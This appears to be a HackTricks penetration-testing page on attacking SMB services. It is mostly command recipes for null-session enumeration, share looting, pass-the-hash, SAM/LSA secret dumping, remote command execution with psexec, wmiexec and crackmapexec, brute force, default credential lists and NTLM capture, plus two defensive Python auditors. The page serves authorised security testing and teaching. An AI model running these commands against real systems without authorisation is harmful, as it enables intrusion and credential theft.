# 139,445 - Pentesting SMB

<details>

<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Other ways to support HackTricks:

* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF**, check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
## **Port 139**

**_Network Basic Input Output System_ (NetBIOS)** is a software protocol designed to enable applications, PCs, and desktops within a local area network (LAN) to interact with network hardware and to **facilitate the transmission of data across the network**. Software applications running on a NetBIOS network are identified and located by their NetBIOS names, which can be up to 16 characters long and are often different from the computer name. A NetBIOS session between two applications is started when one application (acting as the client) issues a "call" command to another application (acting as the server), using **TCP port 139**.

```
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
```
## Port 445

Technically, port 139 is referred to as "NBT over IP", whereas port 445 is identified as "SMB over IP". The acronym **SMB** stands for "**Server Message Blocks**", which is also known in modern terms as the **Common Internet File System (CIFS)**. As an application-layer network protocol, SMB/CIFS is mainly used to provide shared access to files, printers and serial ports, and to facilitate various forms of communication between nodes on a network.

For instance, in a Windows environment, SMB can run directly over TCP/IP by using port 445, which removes the need for NetBIOS over TCP/IP. Conversely, on other systems the use of port 139 indicates that SMB is being run together with NetBIOS over TCP/IP.

```
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
```
### SMB

The **Server Message Block (SMB)** protocol, operating in a **client-server** model, is designed to regulate **access to files**, directories, and other network resources such as printers and routers. Primarily used within the **Windows** operating system family, SMB ensures backward compatibility, allowing devices with newer versions of Microsoft's operating system to interact seamlessly with those running older versions. Additionally, the **Samba** project offers a free software solution that implements SMB on **Linux** and Unix systems, thereby enabling cross-platform communication over SMB.

Shares, representing **arbitrary parts of the local file system**, can be offered by an SMB server, so the hierarchy visible to a client is partly **independent** of the server's actual structure. **Access Control Lists (ACLs)** define the **access rights** and allow **fine-grained control** over user permissions, with attributes such as **`execute`**, **`read`**, and **`full access`**. These permissions can be assigned to individual users or groups, per share, and are distinct from the local permissions set on the server.

### IPC$ Share

Access to the IPC$ share can be obtained through an anonymous null session, which allows interaction with the services exposed via named pipes. The utility `enum4linux` is useful for this purpose. Used properly, it enables the acquisition of:

- Information on the operating system
- Details on the parent domain
- A compilation of local users and groups
- Information on available SMB shares
- The effective system security policy

This functionality is critical for network administrators and security professionals assessing the security posture of SMB (Server Message Block) services on a network. `enum4linux` provides a comprehensive view of the target system's SMB environment, which is essential for identifying potential vulnerabilities and ensuring that the SMB services are properly secured.

```bash
enum4linux -a target_ip
```

The above command is an example of how `enum4linux` can be used to perform a full enumeration against the target specified by `target_ip`.

## What is NTLM

If you don't know what NTLM is, or you want to know how it works and how to abuse it, you will find this page about **NTLM** very interesting, where it explains **how this protocol works and how you can take advantage of it**:

{% content-ref url="../windows-hardening/ntlm/" %}
[ntlm](../windows-hardening/ntlm/)
{% endcontent-ref %}

## **Server Enumeration**

### **Scan** a network searching for hosts:

```bash
nbtscan -r 192.168.0.1/24
```

### SMB server version

To look for possible exploits for the SMB version, it is important to know which version is in use. If this information does not appear in the output of the other tools you used, you can:

- Use the **MSF** auxiliary module **auxiliary/scanner/smb/smb\_version**
- Or use this script:

```bash
#!/bin/sh
#Author: rewardone
#Description:
# Requires root or enough permissions to use tcpdump
# Will listen for the first 7 packets of a null login
# and grab the SMB Version
#Notes:
# Will sometimes not capture or will print multiple
# lines. May need to run a second time for success.
# The capture interface (tap0) is hard-coded; change it to match your setup.
if [ -z "$1" ]; then echo "Usage: ./smbver.sh RHOST {RPORT}" && exit; else rhost="$1"; fi
if [ ! -z "$2" ]; then rport="$2"; else rport=139; fi
tcpdump -s0 -n -i tap0 src "$rhost" and port "$rport" -A -c 7 2>/dev/null | grep -i "samba\|s.a.m" | tr -d '.' | grep -oP 'UnixSamba.*[0-9a-z]' | tr -d '\n' & echo -n "$rhost: " &
echo "exit" | smbclient -L "$rhost" 1>/dev/null 2>/dev/null
echo "" && sleep .1
```

### **Search exploits**

```bash
msf> search type:exploit platform:windows target:2008 smb
searchsploit microsoft smb
```

### **Possible** Credentials

| **Username(s)**      | **Common passwords**                      |
| -------------------- | ----------------------------------------- |
| _(blank)_            | _(blank)_                                 |
| guest                | _(blank)_                                 |
| Administrator, admin | _(blank)_, password, administrator, admin |
| arcserve             | arcserve, backup                          |
| tivoli, tmersrvd     | tivoli, tmersrvd, admin                   |
| backupexec, backup   | backupexec, backup, arcada                |
| test, lab, demo      | password, test, lab, demo                 |

### Brute Force

* [**SMB brute force**](../generic-methodologies-and-resources/brute-force.md#smb)

### SMB Environment Information

### Obtain Information

```bash
#Dump interesting information
enum4linux -a [-u "<username>" -p "<passwd>"] <IP>
enum4linux-ng -A [-u "<username>" -p "<passwd>"] <IP>
nmap --script "safe or smb-enum-*" -p 445 <IP>
#Connect to the rpc
rpcclient -U "" -N <IP> #No creds
rpcclient //machine.htb -U domain.local/USERNAME%754d87d42adabcca32bdb34a876cbffb --pw-nt-hash
rpcclient -U "username%passwd" <IP> #With creds
#You can use querydispinfo and enumdomusers to query user information
#Dump user information
/usr/share/doc/python3-impacket/examples/samrdump.py -port 139 [[domain/]username[:password]@]<targetName or address>
/usr/share/doc/python3-impacket/examples/samrdump.py -port 445 [[domain/]username[:password]@]<targetName or address>
#Map possible RPC endpoints
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 135 [[domain/]username[:password]@]<targetName or address>
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 139 [[domain/]username[:password]@]<targetName or address>
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 445 [[domain/]username[:password]@]<targetName or address>
```

### Enumerate Users, Groups & Logged-On Users

This information should already have been gathered by enum4linux and enum4linux-ng.

```bash
crackmapexec smb 10.10.10.10 --users [-u <username> -p <password>]
crackmapexec smb 10.10.10.10 --groups [-u <username> -p <password>]
crackmapexec smb 10.10.10.10 --groups --loggedon-users [-u <username> -p <password>]

ldapsearch -x -b "DC=DOMAIN_NAME,DC=LOCAL" -s sub "(&(objectclass=user))" -h 10.10.10.10 | grep -i samaccountname: | cut -f 2 -d " "

rpcclient -U "" -N 10.10.10.10
enumdomusers
enumdomgroups
```
### Enumerate local users

[Impacket](https://github.com/fortra/impacket/blob/master/examples/lookupsid.py)

```bash
lookupsid.py -no-pass hostname.local
```

One-liner

```bash
for i in $(seq 500 1100);do rpcclient -N -U "" 10.10.10.10 -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo "";done
```
### Metasploit - Enumerate local users

```bash
use auxiliary/scanner/smb/smb_lookupsid
set rhosts hostname.local
run
```

### **Enumerate LSARPC and SAMR with rpcclient**

{% content-ref url="pentesting-smb/rpcclient-enumeration.md" %}
[rpcclient-enumeration.md](pentesting-smb/rpcclient-enumeration.md)
{% endcontent-ref %}

### GUI connection from Linux

#### In the terminal:

`xdg-open smb://cascade.htb/`

#### In the file browser window (nautilus, thunar, etc.)

`smb://friendzone.htb/general/`

## Shared Folders Enumeration

### List shared folders

It is always recommended to check whether you can access anything; if you don't have credentials, try using **null credentials / the guest user**.

```bash
smbclient --no-pass -L //<IP> # Null user
smbclient -U 'username[%passwd]' -L [--pw-nt-hash] //<IP> #If you omit the pwd, it will be prompted. With --pw-nt-hash, the pwd provided is the NT hash

smbmap -H <IP> [-P <PORT>] #Null user
smbmap -u "username" -p "password" -H <IP> [-P <PORT>] #Creds
smbmap -u "username" -p "<NT>:<LM>" -H <IP> [-P <PORT>] #Pass-the-Hash
smbmap -R -u "username" -p "password" -H <IP> [-P <PORT>] #Recursive list

crackmapexec smb <IP> -u '' -p '' --shares #Null user
crackmapexec smb <IP> -u 'username' -p 'password' --shares #Guest user
crackmapexec smb <IP> -u 'username' -H '<HASH>' --shares #Guest user
```

### **Connect/List a shared folder**

```bash
#Connect using smbclient
smbclient --no-pass //<IP>/<Folder>
smbclient -U 'username[%passwd]' -L [--pw-nt-hash] //<IP> #If you omit the pwd, it will be prompted. With --pw-nt-hash, the pwd provided is the NT hash
#Use --no-pass -c 'recurse;ls' to list recursively with smbclient

#List with smbmap; without a folder it lists everything
smbmap [-u "username" -p "password"] -R [Folder] -H <IP> [-P <PORT>] # Recursive list
smbmap [-u "username" -p "password"] -r [Folder] -H <IP> [-P <PORT>] # Non-Recursive list
smbmap -u "username" -p "<NT>:<LM>" [-r/-R] [Folder] -H <IP> [-P <PORT>] #Pass-the-Hash
```

### **Manually enumerate Windows shares and connect to them**

It is possible that you are restricted from displaying any shares of the host machine and that, when you try to list them, it appears as if there are no shares to connect to. It may therefore be worth a short try to connect to a share manually. To enumerate the shares manually, look for responses like NT\_STATUS\_ACCESS\_DENIED and NT\_STATUS\_BAD\_NETWORK\_NAME when using a valid session (e.g. a null session or valid credentials). These may indicate whether the share exists but you have no access to it, or whether the share does not exist at all.

Common share names for Windows targets are

* C$
* D$
* ADMIN$
* IPC$
* PRINT$
* FAX$
* SYSVOL
* NETLOGON

(Common share names from _**Network Security Assessment, 3rd edition**_)

You can try to connect to them with the following commands

```bash
smbclient -U '%' -N \\\\<IP>\\<SHARE> # null session to connect to a windows share
smbclient -U '<USER>' \\\\<IP>\\<SHARE> # authenticated session to connect to a windows share (you will be prompted for a password)
```

or with this script using a null session

```bash
#!/bin/bash
ip='<TARGET-IP-HERE>'
shares=('C$' 'D$' 'ADMIN$' 'IPC$' 'PRINT$' 'FAX$' 'SYSVOL' 'NETLOGON')
for share in "${shares[@]}"; do
    output=$(smbclient -U '%' -N \\\\$ip\\$share -c '')

    if [[ -z $output ]]; then
        echo "[+] creating a null session is possible for $share" # no output if command goes through, thus assuming that a session was created
    else
        echo "$output" # echo error message (e.g. NT_STATUS_ACCESS_DENIED or NT_STATUS_BAD_NETWORK_NAME)
    fi
done
```

Examples

```bash
smbclient -U '%' -N \\\\192.168.0.24\\im_clearly_not_here # returns NT_STATUS_BAD_NETWORK_NAME
smbclient -U '%' -N \\\\192.168.0.24\\ADMIN$ # returns NT_STATUS_ACCESS_DENIED or even gives you a session
```

### **Enumerate shares from Windows / without third-party tools**

PowerShell

```powershell
# Retrieves the SMB shares on the local computer.
Get-SmbShare
Get-WmiObject -Class Win32_Share
# Retrieves the SMB shares on a remote computer.
get-smbshare -CimSession "<computer name or session object>"
# Retrieves the connections established from the local SMB client to the SMB servers.
Get-SmbConnection
```

CMD console

```shell
# List shares on the local computer
net share
# List shares on a remote computer (including hidden ones)
net view \\<ip> /all
```

MMC Snap-in (graphical)

```shell
# Shared Folders: Shared Folders > Shares
fsmgmt.msc
# Computer Management: Computer Management > System Tools > Shared Folders > Shares
compmgmt.msc
```

explorer.exe (graphical): enter `\\<ip>\` to see the available non-hidden shares.

### Mount a shared folder

```bash
mount -t cifs //x.x.x.x/share /mnt/share
mount -t cifs -o "username=user,password=password" //x.x.x.x/share /mnt/share
```

### **Download files**

Read the previous sections to learn how to connect with credentials / Pass-the-Hash.

```bash
#Search a file and download
sudo smbmap -R Folder -H <IP> -A <FileName> -q # Search the file in recursive mode and download it inside /usr/share/smbmap
```

```bash
#Download all
smbclient //<IP>/<share>
> mask ""
> recurse
> prompt
> mget *
#Download everything to current directory
```

### Domain Shared Folders Search

* [**Snaffler**](https://github.com/SnaffCon/Snaffler)

```bash
Snaffler.exe -s -d domain.local -o snaffler.log -v data
```

* [**CrackMapExec**](https://wiki.porchetta.industries/smb-protocol/spidering-shares) spider.
* `-M spider_plus [--share <share_name>]`
* `--pattern txt`

```bash
sudo crackmapexec smb 10.10.10.10 -u username -p pass -M spider_plus --share 'Department Shares'
```

Especially interesting among shared files are those called **`Registry.xml`**, as they **may contain passwords** for users configured with **autologon** via Group Policy, and **`web.config`** files, as they contain credentials.

{% hint style="info" %}
The **SYSVOL share** is **readable** by all authenticated users in the domain. In there you may **find** many different batch, VBScript, and PowerShell **scripts**.\
You should **check** the **scripts** inside it, as you might **find** sensitive information such as **passwords**.
{% endhint %}

## Read Registry

You may be able to **read the registry** using some of the discovered credentials. Impacket's **`reg.py`** lets you try:

```bash
sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKU -s
sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKCU -s
sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKLM -s
```

## Post Exploitation

The **default config** of a **Samba** server is usually located in `/etc/samba/smb.conf` and may contain some **dangerous settings**:

| **Setting**                 | **Description**                                                     |
| --------------------------- | ------------------------------------------------------------------- |
| `browseable = yes`          | Allow listing the available shares in the current share?            |
| `read only = no`            | Forbid the creation and modification of files?                      |
| `writable = yes`            | Allow users to create and modify files?                             |
| `guest ok = yes`            | Allow connecting to the service without using a password?           |
| `enable privileges = yes`   | Honor privileges assigned to a specific SID?                        |
| `create mask = 0777`        | What permissions must be assigned to newly created files?           |
| `directory mask = 0777`     | What permissions must be assigned to newly created directories?     |
| `logon script = script.sh`  | What script needs to be executed on the user's login?               |
| `magic script = script.sh`  | Which script should be executed when the script gets closed?        |
| `magic output = script.out` | Where does the output of the magic script need to be stored?        |
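As an added defender-side example (not HackTricks' or Samba's own code), the following Python audits an `smb.conf` for the settings in the table above. It honours Samba's synonyms (`writable`/`writeable` are the inverse of `read only`, `public` equals `guest ok`), last-assignment-wins and `[global]` inheritance, so a hardened share is not misreported; the configuration it checks is constructed for the demo.

```python
"""Audit a Samba smb.conf for the risky settings in the table above.

Added example (not HackTricks' or Samba's code). Parsing handles what a naive
grep misses: indented lines, ';' and '#' comment lines, case-insensitive keys,
synonyms ('writable'/'writeable' are the inverse of 'read only', 'public' is
'guest ok'), last-assignment-wins, and [global] values that shares inherit.
"""
import re
from typing import Dict, List, Optional, Tuple

# Constructed sample: one weak share next to a hardened one.
SAMPLE_SMB_CONF = """
[global]
   workgroup = WORKGROUP
   ; shares inherit this unless they override it
   guest ok = no

[backups]
   path = /srv/backups
   writable = yes
   # anonymous + writable: anyone on the network can plant files
   guest ok = yes
   create mask = 0777
   directory mask = 0777

[finance]
   path = /srv/finance
   browseable = no
   Read Only = yes
   valid users = @finance
   create mask = 0660
   directory mask = 0770
"""

TRUE_WORDS = {"yes", "true", "1"}
# Samba's built-in defaults for the keys checked here.
DEFAULTS = {"browseable": "yes", "writable": "no", "guest ok": "no",
            "create mask": "0744", "directory mask": "0755"}
SYNONYMS = {"writable": ("writable", "writeable", "read only"),
            "guest ok": ("guest ok", "public"),
            "browseable": ("browseable", "browsable")}

Section = List[Tuple[str, str]]   # ordered (key, value) pairs


def parse_smb_conf(text: str) -> Dict[str, Section]:
    """Return {section name: [(key, value), ...]} keeping assignment order."""
    conf: Dict[str, Section] = {}
    current: Optional[str] = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in ";#":
            continue
        head = re.match(r"^\[(.+)\]$", line)
        if head:
            current = head.group(1).strip().lower()
            conf.setdefault(current, [])
            continue
        if current is None or "=" not in line:
            continue
        key, _, value = line.partition("=")
        conf[current].append((" ".join(key.lower().split()), value.strip()))
    return conf


def setting(conf: Dict[str, Section], share: str, key: str) -> Optional[str]:
    """Effective value for `share`: its own last assignment of the key (or a
    synonym), else [global]'s, else Samba's default. 'read only' is inverted
    when the question is about 'writable'."""
    names = SYNONYMS.get(key, (key,))
    for section in (share, "global"):
        for k, v in reversed(conf.get(section, [])):
            if k in names:
                if key == "writable" and k == "read only":
                    return "no" if v.lower() in TRUE_WORDS else "yes"
                return v
    return DEFAULTS.get(key)


def is_true(value: Optional[str]) -> bool:
    return bool(value) and value.lower() in TRUE_WORDS


def audit(conf: Dict[str, Section]) -> Dict[str, List[str]]:
    """Map every share to the list of risky effective settings it ends up with."""
    report: Dict[str, List[str]] = {}
    for share in conf:
        if share == "global":
            continue
        findings: List[str] = []
        guest = is_true(setting(conf, share, "guest ok"))
        writable = is_true(setting(conf, share, "writable"))
        if guest:
            findings.append("guest ok: reachable without a password")
        if writable:
            findings.append("writable: clients can create and modify files")
        if guest and writable:
            findings.append("anonymous write: anyone on the network can plant files")
        for key in ("create mask", "directory mask"):
            mask = setting(conf, share, key)
            try:
                bits = int(mask, 8)
            except (TypeError, ValueError):
                continue
            if bits & 0o002:
                findings.append(f"{key} = {mask}: new entries are world-writable")
        # Server-side hooks: whoever can edit these scripts controls what runs.
        for key in ("logon script", "magic script"):
            script = setting(conf, share, key)
            if script:
                findings.append(f"{key} = {script}: check who can modify it")
        report[share] = findings
    return report


if __name__ == "__main__":
    for share, findings in audit(parse_smb_conf(SAMPLE_SMB_CONF)).items():
        print(f"[{share}] " + (", ".join(findings) or "no risky settings"))
```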

The command `smbstatus` gives information about the **server** and about **who is connected**.

## Authenticate using Kerberos

You can **authenticate to kerberos** using the tools **smbclient** and **rpcclient**:

```bash
smbclient --kerberos //ws01win10.domain.com/C$
rpcclient -k ws01win10.domain.com
```

## **Execute Commands**

### **crackmapexec**

crackmapexec can execute commands **abusing** any of **mmcexec, smbexec, atexec, wmiexec**, with **wmiexec** being the **default** method. You can indicate which option you prefer with the parameter `--exec-method`:

```bash
apt-get install crackmapexec

crackmapexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -X '$PSVersionTable' #Execute Powershell
crackmapexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -x whoami #Execute cmd
crackmapexec smb 192.168.10.11 -u Administrator -H <NTHASH> -x whoami #Pass-the-Hash
# Using --exec-method {mmcexec,smbexec,atexec,wmiexec}

crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --sam #Dump SAM
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --lsa #Dump LSA secrets
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --sessions #Get sessions
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --loggedon-users #Get logged-on users
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --disks #Enumerate the disks
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --users #Enumerate users
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --groups # Enumerate groups
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --local-groups # Enumerate local groups
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --pass-pol #Get password policy
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --rid-brute #RID brute

crackmapexec smb <IP> -d <DOMAIN> -u Administrator -H <HASH> #Pass-The-Hash
```

### [**psexec**](../windows-hardening/ntlm/psexec-and-winexec.md)**/**[**smbexec**](../windows-hardening/ntlm/smbexec.md)

Both options **create a new service** (using _\pipe\svcctl_ via SMB) on the victim machine and use it to **execute something** (**psexec** **uploads** an executable file to the ADMIN$ share, while **smbexec** points the service at **cmd.exe/powershell.exe** and puts the payload in its arguments, a **file-less technique**).\
**More info** about [**psexec**](../windows-hardening/ntlm/psexec-and-winexec.md) and [**smbexec**](../windows-hardening/ntlm/smbexec.md).\
In **kali** they are located in /usr/share/doc/python3-impacket/examples/

```bash
#If no password is provided, it will be prompted
./psexec.py [[domain/]username[:password]@]<targetName or address>
./psexec.py -hashes <LM:NT> administrator@10.10.10.103 #Pass-the-Hash
psexec \\192.168.122.66 -u Administrator -p 123456Ww
psexec \\192.168.122.66 -u Administrator -p q23q34t34twd3w34t34wtw34t # Use pass the hash
```

Using the **parameter** `-k` you can authenticate against **kerberos** instead of **NTLM**

### [wmiexec](../windows-hardening/ntlm/wmicexec.md)/dcomexec

Execute a command shell using DCOM via **port 135**, without touching the disk or running a new service.\
In **kali** it is located in /usr/share/doc/python3-impacket/examples/

```bash
#If no password is provided, it will be prompted
./wmiexec.py [[domain/]username[:password]@]<targetName or address> #Prompt for password
./wmiexec.py -hashes LM:NT administrator@10.10.10.103 #Pass-the-Hash
#You can append to the end of the command a CMD command to be executed; if you don't, a semi-interactive shell will be prompted
```

Using the **parameter** `-k` you can authenticate against **kerberos** instead of **NTLM**.

```bash
#If no password is provided, it will be prompted
./dcomexec.py [[domain/]username[:password]@]<targetName or address>
./dcomexec.py -hashes <LM:NT> administrator@10.10.10.103 #Pass-the-Hash
#You can append to the end of the command a CMD command to be executed; if you don't, a semi-interactive shell will be prompted
```

### [AtExec](../windows-hardening/ntlm/atexec.md)

Execute commands via the Task Scheduler (using _\pipe\atsvc_ via SMB).\
In **kali** it is located in /usr/share/doc/python3-impacket/examples/

```bash
./atexec.py [[domain/]username[:password]@]<targetName or address> "command"
./atexec.py -hashes <LM:NT> administrator@10.10.10.175 "whoami"
```

## Impacket reference

[https://www.hackingarticles.in/beginners-guide-to-impacket-tool-kit-part-1/](https://www.hackingarticles.in/beginners-guide-to-impacket-tool-kit-part-1/)

## **Bruteforce user credentials**

**This is not recommended: you could lock out an account if you exceed the maximum allowed number of attempts**

```bash
nmap --script smb-brute -p 445 <IP>
ridenum.py <IP> 500 50000 /root/passwds.txt #Get usernames by bruteforcing those RIDs and then try to bruteforce each user name
```

## SMB relay attack

This attack uses the Responder toolkit to **capture SMB authentication sessions** on an internal network and **relay** them to a **target machine**. If the authentication **session is successful**, it will automatically drop you into a **system** **shell**.\
[**More information about this attack here.**](../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)

## SMB-Trap

The Windows library URLMon.dll automatically tries to authenticate to the host when a page tries to access some content via SMB, for example: `img src="\\10.10.10.10\path\image.jpg"`

This happens with the functions:

- URLDownloadToFile
- URLDownloadToCache
- URLOpenStream
- URLOpenBlockingStream

These functions are used by some browsers and tools (such as Skype).
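As an added example from the defender's side (not code from the original page), the following Python scans HTML for the SMB-Trap pattern shown above: attributes that a browser or URLMon-based client loads automatically whose value is a UNC path (`\\host\share\...`) or a `file:` URL with a host. A code reviewer or a mail/web gateway can flag such references before any client authenticates to the named host; the sample HTML is constructed for the demo.

```python
"""Find HTML references that make a Windows client fetch a resource over SMB.

Added example, not from the original page. It flags the SMB-Trap pattern
(img src="\\10.10.10.10\path\image.jpg") in any attribute a browser or
URLMon-based client loads without a click, so the reference can be spotted
before a client authenticates to the listed host. Sample HTML is constructed.
"""
import re
from html.parser import HTMLParser
from typing import List, Optional, Tuple
from urllib.parse import urlsplit

# (tag, attribute) pairs that a client fetches without any user click.
AUTO_FETCH = {
    ("img", "src"), ("script", "src"), ("iframe", "src"), ("frame", "src"),
    ("embed", "src"), ("video", "src"), ("audio", "src"), ("source", "src"),
    ("input", "src"), ("video", "poster"), ("object", "data"),
    ("link", "href"), ("body", "background"),
}
UNC_RE = re.compile(r"^\\\\([^\\]+)\\([^\\]+)")   # \\host\share\...

Hit = Tuple[str, str, str, str]   # (tag, attribute, host, share)


def unc_target(value: str) -> Optional[Tuple[str, str]]:
    """Return (host, share) if `value` names an SMB location, else None.

    Recognised forms: \\host\share\..., file://host/share/... and
    file://///host/share/... (Windows treats four or more slashes after
    'file:' as a UNC path). file:///C:/... has no host and is local, so it
    is not reported.
    """
    value = value.strip()
    m = UNC_RE.match(value)
    if m:
        return m.group(1), m.group(2)
    if value.lower().startswith("file:"):
        parts = urlsplit(value)
        segments = [s for s in parts.path.split("/") if s]
        if parts.netloc:                      # file://host/share/...
            return parts.netloc, (segments[0] if segments else "")
        if parts.path.startswith("//") and len(segments) >= 2:
            return segments[0], segments[1]   # file://///host/share/...
    return None


class UncReferenceFinder(HTMLParser):
    """Collect every auto-fetched attribute whose value points at SMB."""

    def __init__(self) -> None:
        super().__init__()
        self.hits: List[Hit] = []

    def handle_starttag(self, tag, attrs) -> None:
        for name, value in attrs:
            if (tag, name) in AUTO_FETCH and value:
                target = unc_target(value)
                if target:
                    self.hits.append((tag, name, target[0], target[1]))


def find_unc_references(html: str) -> List[Hit]:
    parser = UncReferenceFinder()
    parser.feed(html)
    parser.close()
    return parser.hits


# Constructed sample: three automatic SMB loads, one click-only link,
# one local file: URL and one ordinary https image.
SAMPLE_HTML = r"""
<html><body background="\\10.10.10.10\pics\bg.jpg">
<img src="\\10.10.10.10\path\image.jpg">
<img src="https://example.test/logo.png">
<link rel="stylesheet" href="file://///10.10.10.10/styles/site.css">
<a href="\\10.10.10.10\share\doc.pdf">download</a>
<object data="file:///C:/local/thing.swf"></object>
</body></html>
"""

if __name__ == "__main__":
    for tag, attr, host, share in find_unc_references(SAMPLE_HTML):
        print(f"<{tag} {attr}> loads from \\\\{host}\\{share} over SMB")
```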

![From: http://www.elladodelmal.com/2017/02/como-hacer-ataques-smbtrap-windows-con.html](<../.gitbook/assets/image (93).png>)

### SMBTrap using MitMf

![From: http://www.elladodelmal.com/2017/02/como-hacer-ataques-smbtrap-windows-con.html](<../.gitbook/assets/image (94).png>)

## NTLM Theft

Similar to SMB trapping, planting malicious files on a target system (via SMB, for example) can provoke an SMB authentication attempt, allowing the NetNTLMv2 hash to be intercepted with a tool such as Responder. The hash can then be cracked offline or used in an [SMB relay attack](pentesting-smb.md#smb-relay-attack).

[See: ntlm\_theft](../windows-hardening/ntlm/places-to-steal-ntlm-creds.md#ntlm\_theft)
## HackTricks Automatic Commands

```
Protocol_Name: SMB #Protocol Abbreviation if there is one.
Port_Number: 137,138,139 #Comma separated if there is more than one.
Protocol_Description: Server Message Block #Protocol Abbreviation Spelled out

Entry_1:
Name: Notes
Description: Notes for SMB
Note: |
While Port 139 is known technically as 'NBT over IP', Port 445 is 'SMB over IP'. SMB stands for 'Server Message Blocks'. Server Message Block in modern language is also known as Common Internet File System. The system operates as an application-layer network protocol primarily used for offering shared access to files, printers, serial ports, and other sorts of communications between nodes on a network.

#These are the commands I run in order every time I see an open SMB port

With No Creds
nbtscan {IP}
smbmap -H {IP}
smbmap -H {IP} -u null -p null
smbmap -H {IP} -u guest
smbclient -N -L //{IP}
smbclient -N //{IP}/ --option="client min protocol"=LANMAN1
rpcclient {IP}
rpcclient -U "" {IP}
crackmapexec smb {IP}
crackmapexec smb {IP} --pass-pol -u "" -p ""
crackmapexec smb {IP} --pass-pol -u "guest" -p ""
GetADUsers.py -dc-ip {IP} "{Domain_Name}/" -all
GetNPUsers.py -dc-ip {IP} -request "{Domain_Name}/" -format hashcat
GetUserSPNs.py -dc-ip {IP} -request "{Domain_Name}/"
getArch.py -target {IP}

With Creds
smbmap -H {IP} -u {Username} -p {Password}
smbclient "\\\\{IP}\\\" -U {Username} -W {Domain_Name} -l {IP}
smbclient "\\\\{IP}\\\" -U {Username} -W {Domain_Name} -l {IP} --pw-nt-hash `hash`
crackmapexec smb {IP} -u {Username} -p {Password} --shares
GetADUsers.py {Domain_Name}/{Username}:{Password} -all
GetNPUsers.py {Domain_Name}/{Username}:{Password} -request -format hashcat
GetUserSPNs.py {Domain_Name}/{Username}:{Password} -request
https://book.hacktricks.xyz/pentesting/pentesting-smb

Entry_2:
Name: Enum4Linux
Description: General SMB Scan
Command: enum4linux -a {IP}

Entry_3:
Name: Nmap SMB Scan 1
Description: SMB Vuln Scan With Nmap
Command: nmap -p 139,445 -vv -Pn --script=smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse {IP}

Entry_4:
Name: Nmap Smb Scan 2
Description: SMB Vuln Scan With Nmap (Less Specific)
Command: nmap --script 'smb-vuln*' -Pn -p 139,445 {IP}

Entry_5:
Name: Hydra Brute Force
Description: Need User
Command: hydra -t 1 -V -f -l {Username} -P {Big_Passwordlist} {IP} smb

Entry_6:
Name: SMB/SMB2 139/445 consoleless mfs enumeration
Description: SMB/SMB2 139/445 enumeration without the need to run msfconsole
Note: sourced from https://github.com/carlospolop/legion
Command: msfconsole -q -x 'use auxiliary/scanner/smb/smb_version; set RHOSTS {IP}; set RPORT 139; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb2; set RHOSTS {IP}; set RPORT 139; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb_version; set RHOSTS {IP}; set RPORT 445; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb2; set RHOSTS {IP}; set RPORT 445; run; exit'

```